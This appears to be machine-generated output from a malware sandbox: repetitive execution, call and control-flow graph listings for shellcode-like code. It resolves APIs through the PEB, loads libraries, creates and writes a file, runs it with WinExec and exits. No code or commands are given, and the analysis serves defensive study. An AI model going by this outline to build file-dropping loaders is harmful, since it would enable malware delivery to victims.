                                                                                                                                                execution_graph 5095 3500391 5097 350027d 5095->5097 5143 35003b7 ExitProcess 5097->5143 5098 3500428 5231 350045f 5098->5231 5099 350044f 5100 3500455 5099->5100 5101 35004bb 5099->5101 5103 3500459 5100->5103 5105 35004be 5100->5105 5104 35004cf 33 API calls 5101->5104 5106 3500474 CreateFileW 5103->5106 5104->5105 5109 35004f6 30 API calls 5105->5109 5108 3500496 40 API calls 5106->5108 5107 35003a5 5107->5098 5107->5099 5107->5103 5107->5106 5111 350040d 5107->5111 5112 350047f 5107->5112 5116 3500486 5108->5116 5110 35004dc 5109->5110 5113 3500509 5110->5113 5114 350056e 5110->5114 5190 350044c 5111->5190 5115 3500496 40 API calls 5112->5115 5112->5116 5117 3500535 24 API calls 5113->5117 5137 3500578 5113->5137 5120 350058f 15 API calls 5114->5120 5114->5137 5115->5116 5119 3500523 5117->5119 5126 35005cf 5119->5126 5130 350055d 5119->5130 5123 3500574 5120->5123 5121 3500636 5124 350064a 3 API calls 5121->5124 5122 35005ab 12 API calls 5127 35005a1 5122->5127 5123->5126 5123->5127 5123->5137 5125 350063e 5124->5125 5128 3500643 5125->5128 5129 35006a8 WinExec 5125->5129 5133 35005e9 6 API calls 5126->5133 5127->5121 5127->5128 5131 35005a6 5127->5131 5135 3500629 WriteFile 5127->5135 5136 350066b 3 API calls 5128->5136 5132 35006bc ExitProcess 5129->5132 5134 350058f 15 API calls 5130->5134 5138 35006b0 5132->5138 5133->5127 5134->5137 5135->5127 5139 3500657 5136->5139 5137->5122 5137->5127 5140 35006bf ExitProcess 5138->5140 5141 3500694 5138->5141 5139->5141 5142 350069c 3 API calls 5139->5142 5142->5141 5236 35003d0 5143->5236 5145 3500428 5149 350045f 41 API calls 5145->5149 5146 350044f 5147 3500455 5146->5147 5148 35004bb 5146->5148 5150 3500459 5147->5150 5152 35004be 5147->5152 5151 35004cf 33 API calls 5148->5151 5149->5146 5153 3500474 CreateFileW 5150->5153 5151->5152 5156 35004f6 30 API calls 5152->5156 5155 3500496 40 API calls 5153->5155 5154 35003c3 5154->5145 5154->5146 5154->5150 5154->5153 5158 350040d 5154->5158 5159 350047f 5154->5159 5163 3500486 5155->5163 5157 35004dc 5156->5157 5160 3500509 5157->5160 5161 350056e 5157->5161 5166 350044c 45 API calls 5158->5166 5162 3500496 40 API calls 5159->5162 5159->5163 5164 3500578 5160->5164 5165 3500535 24 API calls 5160->5165 5161->5164 5168 350058f 15 API calls 5161->5168 5162->5163 5170 35005ab 12 API calls 5164->5170 5172 35005a1 5164->5172 5167 3500523 5165->5167 5166->5145 5175 35005cf 5167->5175 5177 350055d 5167->5177 5171 3500574 5168->5171 5169 3500636 5173 350064a 3 API calls 5169->5173 5170->5172 5171->5164 5171->5172 5171->5175 5172->5169 5178 35005a6 5172->5178 5181 3500643 5172->5181 5183 3500629 WriteFile 5172->5183 5174 350063e 5173->5174 5176 35006a8 WinExec 5174->5176 5174->5181 5180 35005e9 6 API calls 5175->5180 5179 35006bc ExitProcess 5176->5179 5182 350058f 15 API calls 5177->5182 5178->5107 5185 35006b0 5179->5185 5180->5172 5184 350066b 3 API calls 5181->5184 5182->5164 5183->5172 5186 3500657 5184->5186 5187 35006bf ExitProcess 5185->5187 5188 3500694 5185->5188 5186->5188 5189 350069c 3 API calls 5186->5189 5188->5107 5189->5188 5191 350044e 5190->5191 5192 350045f 41 API calls 5191->5192 5193 350044f 5192->5193 5194 3500455 5193->5194 5195 35004bb 5193->5195 5197 3500459 CreateFileW 5194->5197 5198 35004be 5194->5198 5196 35004cf 33 API calls 5195->5196 5196->5198 5200 3500496 40 API calls 5197->5200 5201 35004f6 30 API calls 5198->5201 5205 3500486 5200->5205 5202 35004dc 5201->5202 5203 3500509 5202->5203 5204 350056e 5202->5204 5206 3500535 24 API calls 5203->5206 5225 3500578 5203->5225 5208 350058f 15 API calls 5204->5208 5204->5225 5207 3500523 5206->5207 5214 35005cf 5207->5214 5218 350055d 5207->5218 5211 3500574 5208->5211 5209 3500636 5212 350064a 3 API calls 5209->5212 5210 35005ab 12 API calls 5215 35005a1 5210->5215 5211->5214 5211->5215 5211->5225 5213 350063e 5212->5213 5216 3500643 5213->5216 5217 35006a8 WinExec 5213->5217 5221 35005e9 6 API calls 5214->5221 5215->5209 5215->5216 5219 35005a6 5215->5219 5223 3500629 WriteFile 5215->5223 5224 350066b 3 API calls 5216->5224 5220 35006bc ExitProcess 5217->5220 5222 350058f 15 API calls 5218->5222 5219->5098 5226 35006b0 5220->5226 5221->5215 5222->5225 5223->5215 5229 3500657 5224->5229 5225->5210 5225->5215 5227 3500694 5226->5227 5228 35006bf ExitProcess 5226->5228 5227->5098 5229->5227 5230 350069c 3 API calls 5229->5230 5230->5227 5232 3500462 CreateFileW 5231->5232 5234 3500496 40 API calls 5232->5234 5235 3500486 5234->5235 5237 35003d6 5236->5237 5284 35003ec 5237->5284 5239 3500428 5243 350045f 41 API calls 5239->5243 5240 350044f 5241 3500455 5240->5241 5242 35004bb 5240->5242 5244 3500459 5241->5244 5246 35004be 5241->5246 5245 35004cf 33 API calls 5242->5245 5243->5240 5247 3500474 CreateFileW 5244->5247 5245->5246 5250 35004f6 30 API calls 5246->5250 5249 3500496 40 API calls 5247->5249 5248 35003dd 5248->5239 5248->5240 5248->5244 5248->5247 5252 350040d 5248->5252 5253 350047f 5248->5253 5257 3500486 5249->5257 5251 35004dc 5250->5251 5254 3500509 5251->5254 5255 350056e 5251->5255 5259 350044c 45 API calls 5252->5259 5256 3500496 40 API calls 5253->5256 5253->5257 5258 3500535 24 API calls 5254->5258 5278 3500578 5254->5278 5261 350058f 15 API calls 5255->5261 5255->5278 5256->5257 5260 3500523 5258->5260 5259->5239 5267 35005cf 5260->5267 5271 350055d 5260->5271 5264 3500574 5261->5264 5262 3500636 5265 350064a 3 API calls 5262->5265 5263 35005ab 12 API calls 5268 35005a1 5263->5268 5264->5267 5264->5268 5264->5278 5266 350063e 5265->5266 5269 3500643 5266->5269 5270 35006a8 WinExec 5266->5270 5274 35005e9 6 API calls 5267->5274 5268->5262 5268->5269 5272 35005a6 5268->5272 5276 3500629 WriteFile 5268->5276 5277 350066b 3 API calls 5269->5277 5273 35006bc ExitProcess 5270->5273 5275 350058f 15 API calls 5271->5275 5272->5154 5279 35006b0 5273->5279 5274->5268 5275->5278 5276->5268 5280 3500657 5277->5280 5278->5263 5278->5268 5281 35006bf ExitProcess 5279->5281 5282 3500694 5279->5282 5280->5282 5283 350069c 3 API calls 5280->5283 5282->5154 5283->5282 5285 35003f2 5284->5285 5332 3500413 5285->5332 5287 3500474 CreateFileW 5289 3500496 40 API calls 5287->5289 5288 35003f9 5288->5287 5290 3500459 5288->5290 5291 350040d 5288->5291 5292 350047f 5288->5292 5294 3500486 5289->5294 5290->5287 5295 350044c 45 API calls 5291->5295 5293 3500496 40 API calls 5292->5293 5292->5294 5293->5294 5296 3500428 5295->5296 5297 350045f 41 API calls 5296->5297 5298 350044f 5297->5298 5299 3500455 5298->5299 5300 35004bb 5298->5300 5299->5290 5302 35004be 5299->5302 5301 35004cf 33 API calls 5300->5301 5301->5302 5303 35004f6 30 API calls 5302->5303 5304 35004dc 5303->5304 5305 3500509 5304->5305 5306 350056e 5304->5306 5307 3500535 24 API calls 5305->5307 5326 3500578 5305->5326 5309 350058f 15 API calls 5306->5309 5306->5326 5308 3500523 5307->5308 5315 35005cf 5308->5315 5319 350055d 5308->5319 5312 3500574 5309->5312 5310 3500636 5313 350064a 3 API calls 5310->5313 5311 35005ab 12 API calls 5316 35005a1 5311->5316 5312->5315 5312->5316 5312->5326 5314 350063e 5313->5314 5317 3500643 5314->5317 5318 35006a8 WinExec 5314->5318 5322 35005e9 6 API calls 5315->5322 5316->5310 5316->5317 5320 35005a6 5316->5320 5324 3500629 WriteFile 5316->5324 5325 350066b 3 API calls 5317->5325 5321 35006bc ExitProcess 5318->5321 5323 350058f 15 API calls 5319->5323 5320->5248 5327 35006b0 5321->5327 5322->5316 5323->5326 5324->5316 5328 3500657 5325->5328 5326->5311 5326->5316 5329 35006bf ExitProcess 5327->5329 5330 3500694 5327->5330 5328->5330 5331 350069c 3 API calls 5328->5331 5330->5248 5331->5330 5333 3500416 5332->5333 5334 350044c 45 API calls 5333->5334 5335 3500428 5334->5335 5336 350045f 41 API calls 5335->5336 5337 350044f 5336->5337 5338 3500455 5337->5338 5339 35004bb 5337->5339 5341 3500459 CreateFileW 5338->5341 5342 35004be 5338->5342 5340 35004cf 33 API calls 5339->5340 5340->5342 5344 3500496 40 API calls 5341->5344 5345 35004f6 30 API calls 5342->5345 5348 3500486 5344->5348 5346 35004dc 5345->5346 5347 3500509 5346->5347 5350 350056e 5346->5350 5349 3500535 24 API calls 5347->5349 5351 3500578 5347->5351 5352 3500523 5349->5352 5350->5351 5353 350058f 15 API calls 5350->5353 5355 35005ab 12 API calls 5351->5355 5357 35005a1 5351->5357 5360 35005cf 5352->5360 5363 350055d 5352->5363 5356 3500574 5353->5356 5354 3500636 5358 350064a 3 API calls 5354->5358 5355->5357 5356->5351 5356->5357 5356->5360 5357->5354 5361 3500643 5357->5361 5364 35005a6 5357->5364 5368 3500629 WriteFile 5357->5368 5359 350063e 5358->5359 5359->5361 5362 35006a8 WinExec 5359->5362 5366 35005e9 6 API calls 5360->5366 5369 350066b 3 API calls 5361->5369 5365 35006bc ExitProcess 5362->5365 5367 350058f 15 API calls 5363->5367 5364->5288 5370 35006b0 5365->5370 5366->5357 5367->5351 5368->5357 5371 3500657 5369->5371 5372 35006bf ExitProcess 5370->5372 5373 3500694 5370->5373 5371->5373 5374 350069c 3 API calls 5371->5374 5373->5288 5374->5373 4753 350045f 4754 3500462 CreateFileW 4753->4754 4758 3500496 LoadLibraryW 4754->4758 4757 3500486 4794 35004ab 4758->4794 4761 35005a1 4763 3500636 4761->4763 4778 3500629 WriteFile 4761->4778 4784 3500643 4761->4784 4785 35005a6 4761->4785 4762 3500523 4769 35005cf 4762->4769 4772 350055d 4762->4772 4941 350064a 4763->4941 4764 350049f 4782 3500509 4764->4782 4829 35004cf 4764->4829 4766 3500578 4766->4761 4951 35005ab 4766->4951 4768 350063e 4771 35006a8 WinExec 4768->4771 4768->4784 4972 35005e9 4769->4972 4770 35004be 4862 35004f6 4770->4862 4949 35006bc 4771->4949 4775 350058f 15 API calls 4772->4775 4775->4766 4778->4761 4780 35004dc 4780->4782 4783 350056e 4780->4783 4781 3500657 4787 3500669 4781->4787 4791 35006cf 4781->4791 4782->4766 4895 3500535 4782->4895 4783->4766 4921 350058f 4783->4921 4989 350066b 4784->4989 4785->4757 4786 35006b0 4789 35006bf ExitProcess 4786->4789 4786->4791 4993 350069c 4787->4993 4790 3500574 4790->4761 4790->4766 4790->4769 4791->4757 4795 35004ae 4794->4795 4796 35004cf 33 API calls 4795->4796 4797 35004be 4796->4797 4798 35004f6 30 API calls 4797->4798 4799 35004dc 4798->4799 4800 3500509 4799->4800 4801 350056e 4799->4801 4802 3500578 4800->4802 4803 3500535 24 API calls 4800->4803 4801->4802 4805 350058f 15 API calls 4801->4805 4804 35005a1 4802->4804 4807 35005ab 12 API calls 4802->4807 4811 3500523 4803->4811 4806 3500636 4804->4806 4813 3500643 4804->4813 4816 35005a6 4804->4816 4820 3500629 WriteFile 4804->4820 4808 3500574 4805->4808 4809 350064a 3 API calls 4806->4809 4807->4804 4808->4802 4808->4804 4812 35005cf 4808->4812 4810 350063e 4809->4810 4810->4813 4814 35006a8 WinExec 4810->4814 4811->4812 4815 350055d 4811->4815 4818 35005e9 6 API calls 4812->4818 4821 350066b 3 API calls 4813->4821 4817 35006bc ExitProcess 4814->4817 4819 350058f 15 API calls 4815->4819 4816->4764 4823 35006b0 4817->4823 4818->4804 4819->4802 4820->4804 4822 3500657 4821->4822 4824 3500669 4822->4824 4826 35006cf 4822->4826 4825 35006bf ExitProcess 4823->4825 4823->4826 4827 350069c 3 API calls 4824->4827 4826->4764 4828 3500694 4827->4828 4828->4826 4830 35004d2 4829->4830 4831 35004f6 30 API calls 4830->4831 4832 35004dc 4831->4832 4833 3500509 4832->4833 4834 350056e 4832->4834 4835 3500535 24 API calls 4833->4835 4854 3500578 4833->4854 4837 350058f 15 API calls 4834->4837 4834->4854 4836 3500523 4835->4836 4843 35005cf 4836->4843 4847 350055d 4836->4847 4840 3500574 4837->4840 4838 3500636 4841 350064a 3 API calls 4838->4841 4839 35005ab 12 API calls 4844 35005a1 4839->4844 4840->4843 4840->4844 4840->4854 4842 350063e 4841->4842 4845 3500643 4842->4845 4846 35006a8 WinExec 4842->4846 4850 35005e9 6 API calls 4843->4850 4844->4838 4844->4845 4848 35005a6 4844->4848 4852 3500629 WriteFile 4844->4852 4853 350066b 3 API calls 4845->4853 4849 35006bc ExitProcess 4846->4849 4851 350058f 15 API calls 4847->4851 4848->4770 4856 35006b0 4849->4856 4850->4844 4851->4854 4852->4844 4855 3500657 4853->4855 4854->4839 4854->4844 4857 3500669 4855->4857 4859 35006cf 4855->4859 4858 35006bf ExitProcess 4856->4858 4856->4859 4860 350069c 3 API calls 4857->4860 4859->4770 4861 3500694 4860->4861 4861->4859 4863 35004f9 4862->4863 5000 3500512 4863->5000 4865 35004ff 4866 3500509 4865->4866 4867 350056e 4865->4867 4868 3500535 24 API calls 4866->4868 4886 3500578 4866->4886 4869 350058f 15 API calls 4867->4869 4867->4886 4872 3500523 4868->4872 4873 3500574 4869->4873 4870 3500636 4874 350064a 3 API calls 4870->4874 4871 35005ab 12 API calls 4884 35005a1 4871->4884 4876 35005cf 4872->4876 4879 350055d 4872->4879 4873->4876 4873->4884 4873->4886 4875 350063e 4874->4875 4877 3500643 4875->4877 4878 35006a8 WinExec 4875->4878 4882 35005e9 6 API calls 4876->4882 4887 350066b 3 API calls 4877->4887 4881 35006bc ExitProcess 4878->4881 4883 350058f 15 API calls 4879->4883 4880 35005a6 4880->4780 4889 35006b0 4881->4889 4882->4884 4883->4886 4884->4870 4884->4877 4884->4880 4885 3500629 WriteFile 4884->4885 4885->4884 4886->4871 4886->4884 4888 3500657 4887->4888 4890 3500669 4888->4890 4892 35006cf 4888->4892 4891 35006bf ExitProcess 4889->4891 4889->4892 4893 350069c 3 API calls 4890->4893 4892->4780 4894 3500694 4893->4894 4894->4892 5027 3500542 4895->5027 4897 350053a 4898 35005cf 4897->4898 4899 350055d 4897->4899 4901 35005e9 6 API calls 4898->4901 4900 350058f 15 API calls 4899->4900 4905 3500578 4900->4905 4903 35005a1 4901->4903 4902 3500643 4906 350066b 3 API calls 4902->4906 4903->4902 4904 3500636 4903->4904 4914 3500629 WriteFile 4903->4914 4915 35005a6 4903->4915 4907 350064a 3 API calls 4904->4907 4905->4903 4912 35005ab 12 API calls 4905->4912 4911 3500657 4906->4911 4908 350063e 4907->4908 4908->4902 4909 35006a8 WinExec 4908->4909 4910 35006bc ExitProcess 4909->4910 4916 35006b0 4910->4916 4913 3500669 4911->4913 4919 35006cf 4911->4919 4912->4903 4917 350069c 3 API calls 4913->4917 4914->4903 4915->4762 4916->4919 4920 35006bf ExitProcess 4916->4920 4918 3500694 4917->4918 4918->4919 4919->4762 4922 3500592 4921->4922 4923 35005ab 12 API calls 4922->4923 4926 35005a1 4923->4926 4924 35005a6 4924->4790 4925 3500629 WriteFile 4925->4926 4926->4924 4926->4925 4927 3500636 4926->4927 4928 350064a 3 API calls 4927->4928 4929 350063e 4928->4929 4930 3500643 4929->4930 4931 35006a8 WinExec 4929->4931 4933 350066b 3 API calls 4930->4933 4932 35006bc ExitProcess 4931->4932 4935 35006b0 4932->4935 4934 3500657 4933->4934 4936 3500669 4934->4936 4938 35006cf 4934->4938 4937 35006bf ExitProcess 4935->4937 4935->4938 4939 350069c 3 API calls 4936->4939 4938->4790 4940 3500694 4939->4940 4940->4938 4942 350064d 4941->4942 4943 350066b 3 API calls 4942->4943 4944 3500657 4943->4944 4945 35006cf 4944->4945 4946 3500669 4944->4946 4945->4768 4947 350069c 3 API calls 4946->4947 4948 3500694 4947->4948 4948->4945 4950 35006bf ExitProcess 4949->4950 4952 35005ae 4951->4952 5076 35005cf 4952->5076 4954 3500629 WriteFile 4961 35005d9 4954->4961 4955 3500643 4959 350066b 3 API calls 4955->4959 4956 35006a8 WinExec 4958 35006bc ExitProcess 4956->4958 4957 35005b5 4957->4954 4960 35005e9 6 API calls 4957->4960 4957->4961 4967 350063a 4957->4967 4963 35006b0 4958->4963 4962 3500657 4959->4962 4960->4961 4961->4954 4961->4955 4964 3500636 4961->4964 4965 35006cf 4962->4965 4969 3500669 4962->4969 4963->4965 4968 35006bf ExitProcess 4963->4968 4966 350064a 3 API calls 4964->4966 4965->4761 4966->4967 4967->4955 4967->4956 4970 350069c 3 API calls 4969->4970 4971 3500694 4970->4971 4971->4965 4979 35005ec 4972->4979 4973 3500636 4974 350064a 3 API calls 4973->4974 4975 350063e 4974->4975 4976 3500643 4975->4976 4977 35006a8 WinExec 4975->4977 4981 350066b 3 API calls 4976->4981 4978 35006bc ExitProcess 4977->4978 4983 35006b0 4978->4983 4979->4973 4980 3500629 WriteFile 4979->4980 4980->4979 4982 3500657 4981->4982 4984 3500669 4982->4984 4986 35006cf 4982->4986 4985 35006bf ExitProcess 4983->4985 4983->4986 4987 350069c 3 API calls 4984->4987 4986->4761 4988 3500694 4987->4988 4988->4986 4990 350066e 4989->4990 4991 350069c 3 API calls 4990->4991 4992 3500694 4991->4992 4992->4781 4994 350069f WinExec 4993->4994 4996 35006bc ExitProcess 4994->4996 4998 35006b0 4996->4998 4997 3500694 4997->4791 4998->4997 4999 35006bf ExitProcess 4998->4999 5001 3500515 5000->5001 5002 3500535 24 API calls 5001->5002 5003 3500523 5001->5003 5002->5003 5004 35005cf 5003->5004 5005 350055d 5003->5005 5007 35005e9 6 API calls 5004->5007 5006 350058f 15 API calls 5005->5006 5010 3500578 5006->5010 5020 35005a1 5007->5020 5008 3500643 5011 350066b 3 API calls 5008->5011 5009 3500636 5012 350064a 3 API calls 5009->5012 5017 35005ab 12 API calls 5010->5017 5010->5020 5014 3500657 5011->5014 5013 350063e 5012->5013 5013->5008 5015 35006a8 WinExec 5013->5015 5018 3500669 5014->5018 5023 35006cf 5014->5023 5016 35006bc ExitProcess 5015->5016 5022 35006b0 5016->5022 5017->5020 5024 350069c 3 API calls 5018->5024 5019 3500629 WriteFile 5019->5020 5020->5008 5020->5009 5020->5019 5021 35005a6 5020->5021 5021->4865 5022->5023 5026 35006bf ExitProcess 5022->5026 5023->4865 5025 3500694 5024->5025 5025->5023 5028 3500545 5027->5028 5054 350055e 5028->5054 5030 350054b 5031 350055d 5030->5031 5032 35005cf 5030->5032 5033 350058f 15 API calls 5031->5033 5034 35005e9 6 API calls 5032->5034 5037 3500578 5033->5037 5047 35005a1 5034->5047 5035 3500643 5038 350066b 3 API calls 5035->5038 5036 3500636 5039 350064a 3 API calls 5036->5039 5044 35005ab 12 API calls 5037->5044 5037->5047 5041 3500657 5038->5041 5040 350063e 5039->5040 5040->5035 5042 35006a8 WinExec 5040->5042 5045 3500669 5041->5045 5050 35006cf 5041->5050 5043 35006bc ExitProcess 5042->5043 5049 35006b0 5043->5049 5044->5047 5051 350069c 3 API calls 5045->5051 5046 3500629 WriteFile 5046->5047 5047->5035 5047->5036 5047->5046 5048 35005a6 5047->5048 5048->4897 5049->5050 5053 35006bf ExitProcess 5049->5053 5050->4897 5052 3500694 5051->5052 5052->5050 5055 3500561 5054->5055 5056 350058f 15 API calls 5055->5056 5058 3500578 5056->5058 5057 3500636 5059 350064a 3 API calls 5057->5059 5064 35005a1 5058->5064 5065 35005ab 12 API calls 5058->5065 5060 350063e 5059->5060 5061 3500643 5060->5061 5062 35006a8 WinExec 5060->5062 5067 350066b 3 API calls 5061->5067 5063 35006bc ExitProcess 5062->5063 5070 35006b0 5063->5070 5064->5057 5066 3500629 WriteFile 5064->5066 5069 35005a6 5064->5069 5065->5064 5066->5064 5068 3500657 5067->5068 5071 3500669 5068->5071 5073 35006cf 5068->5073 5069->5030 5072 35006bf ExitProcess 5070->5072 5070->5073 5074 350069c 3 API calls 5071->5074 5073->5030 5075 3500694 5074->5075 5075->5073 5077 35005d1 5076->5077 5078 35005e9 6 API calls 5077->5078 5084 35005d9 5078->5084 5079 3500643 5080 350066b 3 API calls 5079->5080 5081 3500657 5080->5081 5082 3500669 5081->5082 5087 35006cf 5081->5087 5088 350069c 3 API calls 5082->5088 5083 3500636 5085 350064a 3 API calls 5083->5085 5084->5079 5084->5083 5092 3500629 WriteFile 5084->5092 5086 350063e 5085->5086 5086->5079 5089 35006a8 WinExec 5086->5089 5087->4957 5090 3500694 5088->5090 5091 35006bc ExitProcess 5089->5091 5090->5087 5093 35006b0 5091->5093 5092->5084 5093->5087 5094 35006bf ExitProcess 5093->5094 4751 35006c3 GetPEB 4752 35006d1 4751->4752 6095 3500064 6096 35000d0 6095->6096 6097 350006a 6095->6097 6097->6096 6100 35002df 6097->6100 6099 35002e7 6101 3500216 6100->6101 6102 35003b7 62 API calls 6101->6102 6112 35003a5 6102->6112 6103 3500428 6107 350045f 41 API calls 6103->6107 6104 350044f 6105 3500455 6104->6105 6106 35004bb 6104->6106 6108 3500459 6105->6108 6110 35004be 6105->6110 6109 35004cf 33 API calls 6106->6109 6107->6104 6111 3500474 CreateFileW 6108->6111 6109->6110 6114 35004f6 30 API calls 6110->6114 6113 3500496 40 API calls 6111->6113 6112->6103 6112->6104 6112->6108 6112->6111 6116 350040d 6112->6116 6117 350047f 6112->6117 6121 3500486 6113->6121 6115 35004dc 6114->6115 6118 3500509 6115->6118 6119 350056e 6115->6119 6123 350044c 45 API calls 6116->6123 6120 3500496 40 API calls 6117->6120 6117->6121 6122 3500535 24 API calls 6118->6122 6142 3500578 6118->6142 6125 350058f 15 API calls 6119->6125 6119->6142 6120->6121 6124 3500523 6122->6124 6123->6103 6131 35005cf 6124->6131 6135 350055d 6124->6135 6128 3500574 6125->6128 6126 3500636 6129 350064a 3 API calls 6126->6129 6127 35005ab 12 API calls 6132 35005a1 6127->6132 6128->6131 6128->6132 6128->6142 6130 350063e 6129->6130 6133 3500643 6130->6133 6134 35006a8 WinExec 6130->6134 6138 35005e9 6 API calls 6131->6138 6132->6126 6132->6133 6136 35005a6 6132->6136 6140 3500629 WriteFile 6132->6140 6141 350066b 3 API calls 6133->6141 6137 35006bc ExitProcess 6134->6137 6139 350058f 15 API calls 6135->6139 6136->6099 6143 35006b0 6137->6143 6138->6132 6139->6142 6140->6132 6144 3500657 6141->6144 6142->6127 6142->6132 6145 35006bf ExitProcess 6143->6145 6146 3500694 6143->6146 6144->6146 6147 350069c 3 API calls 6144->6147 6146->6099 6147->6146 6148 3500224 6149 3500242 6148->6149 6150 35003b7 62 API calls 6149->6150 6160 35003a5 6150->6160 6151 350044f 6153 3500455 6151->6153 6154 35004bb 6151->6154 6152 3500428 6155 350045f 41 API calls 6152->6155 6156 3500459 6153->6156 6158 35004be 6153->6158 6157 35004cf 33 API calls 6154->6157 6155->6151 6159 3500474 CreateFileW 6156->6159 6157->6158 6162 35004f6 30 API calls 6158->6162 6161 3500496 40 API calls 6159->6161 6160->6151 6160->6152 6160->6156 6160->6159 6164 350040d 6160->6164 6165 350047f 6160->6165 6169 3500486 6161->6169 6163 35004dc 6162->6163 6166 3500509 6163->6166 6167 350056e 6163->6167 6171 350044c 45 API calls 6164->6171 6168 3500496 40 API calls 6165->6168 6165->6169 6170 3500535 24 API calls 6166->6170 6189 3500578 6166->6189 6173 350058f 15 API calls 6167->6173 6167->6189 6168->6169 6172 3500523 6170->6172 6171->6152 6179 35005cf 6172->6179 6182 350055d 6172->6182 6176 3500574 6173->6176 6174 3500636 6177 350064a 3 API calls 6174->6177 6175 35005ab 12 API calls 6187 35005a1 6175->6187 6176->6179 6176->6187 6176->6189 6178 350063e 6177->6178 6180 3500643 6178->6180 6181 35006a8 WinExec 6178->6181 6185 35005e9 6 API calls 6179->6185 6190 350066b 3 API calls 6180->6190 6184 35006bc ExitProcess 6181->6184 6186 350058f 15 API calls 6182->6186 6183 35005a6 6191 35006b0 6184->6191 6185->6187 6186->6189 6187->6174 6187->6180 6187->6183 6188 3500629 WriteFile 6187->6188 6188->6187 6189->6175 6189->6187 6192 3500657 6190->6192 6193 35006bf ExitProcess 6191->6193 6194 3500694 6191->6194 6192->6194 6195 350069c 3 API calls 6192->6195 6195->6194

                                                                                                                                                Callgraph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                • Disassembly available
                                                                                                                                                callgraph 0 Function_035003D0 4 Function_0350045F 0->4 9 Function_0350064A 0->9 13 Function_0350044C 0->13 17 Function_035004CF 0->17 19 Function_035004F6 0->19 23 Function_035005E9 0->23 24 Function_0350066B 0->24 25 Function_035006EB 0->25 27 Function_035003EC 0->27 34 Function_03500496 0->34 36 Function_0350069C 0->36 41 Function_0350058F 0->41 43 Function_03500535 0->43 46 Function_035006BC 0->46 47 Function_0350073C 0->47 52 Function_035005AB 0->52 1 Function_03500254 1->4 1->9 1->13 1->17 1->19 1->23 1->24 1->25 1->34 1->36 1->41 1->43 45 Function_035003B7 1->45 1->46 1->52 2 Function_0350055E 2->9 2->24 2->25 2->36 2->41 2->46 2->52 3 Function_035002DF 3->4 3->9 3->13 3->17 3->19 3->23 3->24 3->25 3->34 3->36 3->41 3->43 3->45 3->46 3->52 4->34 5 Function_03500542 5->2 5->9 5->23 5->24 5->25 5->36 5->41 5->46 5->52 6 Function_035006C3 6->25 7 Function_03500244 7->4 7->9 7->13 7->17 7->19 7->23 7->24 7->25 7->34 7->36 7->41 7->43 7->45 7->46 7->52 8 Function_03500249 8->4 8->9 8->13 8->17 8->19 8->23 8->24 8->25 8->34 8->36 8->41 8->43 8->45 8->46 8->52 9->24 9->25 9->36 10 Function_035000CB 11 Function_0350024B 11->4 11->9 11->13 11->17 11->19 11->23 11->24 11->25 11->34 11->36 11->41 11->43 11->45 11->46 11->52 12 Function_035002CB 12->4 12->9 12->13 12->17 12->19 12->23 12->24 12->25 12->34 12->36 12->41 12->43 12->45 12->46 12->52 13->4 13->9 13->17 13->19 13->23 13->24 13->25 13->34 13->36 13->41 13->43 13->46 13->52 14 Function_0350034C 14->4 14->9 14->13 14->17 14->19 14->23 14->24 14->25 14->34 14->36 14->41 14->43 14->45 14->46 14->52 15 Function_035002CE 15->4 15->9 15->13 15->17 15->19 15->23 15->24 15->25 15->34 15->36 15->41 15->43 15->45 15->46 15->52 16 Function_035005CF 16->9 16->23 16->24 16->25 16->36 16->46 17->9 17->19 17->23 17->24 17->25 17->36 17->41 17->43 17->46 17->52 18 Function_035002F5 18->4 18->9 18->13 18->17 18->19 18->23 18->24 18->25 18->34 18->36 18->41 18->43 18->45 18->46 18->52 19->9 19->23 19->24 19->25 30 Function_03500512 19->30 19->36 19->41 19->43 19->46 19->52 20 Function_03500279 20->4 20->9 20->13 20->17 20->19 20->23 20->24 20->25 20->34 20->36 20->41 20->43 20->45 20->46 20->52 21 Function_0350037A 22 Function_03500064 22->3 23->9 23->24 23->25 23->36 23->46 24->25 24->36 26 Function_035002EB 26->4 26->9 26->13 26->17 26->19 26->23 26->24 26->25 26->34 26->36 26->41 26->43 26->45 26->46 26->52 27->4 27->9 27->13 27->17 27->19 27->23 27->24 27->25 32 Function_03500413 27->32 27->34 27->36 27->41 27->43 27->46 27->47 27->52 28 Function_0350026D 28->4 28->9 28->13 28->17 28->19 28->23 28->24 28->25 28->34 28->36 28->41 28->43 28->45 28->46 28->52 29 Function_03500391 29->4 29->9 29->13 29->17 29->19 29->23 29->24 29->25 29->34 29->36 29->41 29->43 29->45 29->46 29->52 30->9 30->23 30->24 30->25 30->36 30->41 30->43 30->46 30->52 31 Function_03500292 31->4 31->9 31->13 31->17 31->19 31->23 31->24 31->25 31->34 31->36 31->41 31->43 31->45 31->46 31->52 32->4 32->9 32->13 32->17 32->19 32->23 32->24 32->25 32->34 32->36 32->41 32->43 32->46 32->52 33 Function_03500194 34->9 34->17 34->19 34->23 34->24 34->25 34->36 34->41 34->43 34->46 51 Function_035004AB 34->51 34->52 35 Function_0350031A 35->4 35->9 35->13 35->17 35->19 35->23 35->24 35->25 35->34 35->36 35->41 35->43 35->45 35->46 35->52 36->46 37 Function_0350031F 37->4 37->9 37->13 37->17 37->19 37->23 37->24 37->25 37->34 37->36 37->41 37->43 37->45 37->46 37->52 38 Function_03500000 39 Function_03500207 40 Function_03500289 40->4 40->9 40->13 40->17 40->19 40->23 40->24 40->25 40->34 40->36 40->41 40->43 40->45 40->46 40->52 41->9 41->24 41->25 41->36 41->46 41->52 42 Function_0350028F 42->4 42->9 42->13 42->17 42->19 42->23 42->24 42->25 42->34 42->36 42->41 42->43 42->45 42->46 42->52 43->5 43->9 43->23 43->24 43->25 43->36 43->41 43->46 43->52 44 Function_035001B6 45->0 45->4 45->9 45->13 45->17 45->19 45->23 45->24 45->25 45->34 45->36 45->41 45->43 45->46 45->52 48 Function_0350033F 48->4 48->9 48->13 48->17 48->19 48->23 48->24 48->25 48->34 48->36 48->41 48->43 48->45 48->46 48->52 49 Function_03500224 49->4 49->9 49->13 49->17 49->19 49->23 49->24 49->25 49->34 49->36 49->41 49->43 49->45 49->46 49->52 50 Function_035002A4 50->4 50->9 50->13 50->17 50->19 50->23 50->24 50->25 50->34 50->36 50->41 50->43 50->45 50->46 50->52 51->9 51->17 51->19 51->23 51->24 51->25 51->36 51->41 51->43 51->46 51->52 52->9 52->16 52->23 52->24 52->25 52->36 52->46

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
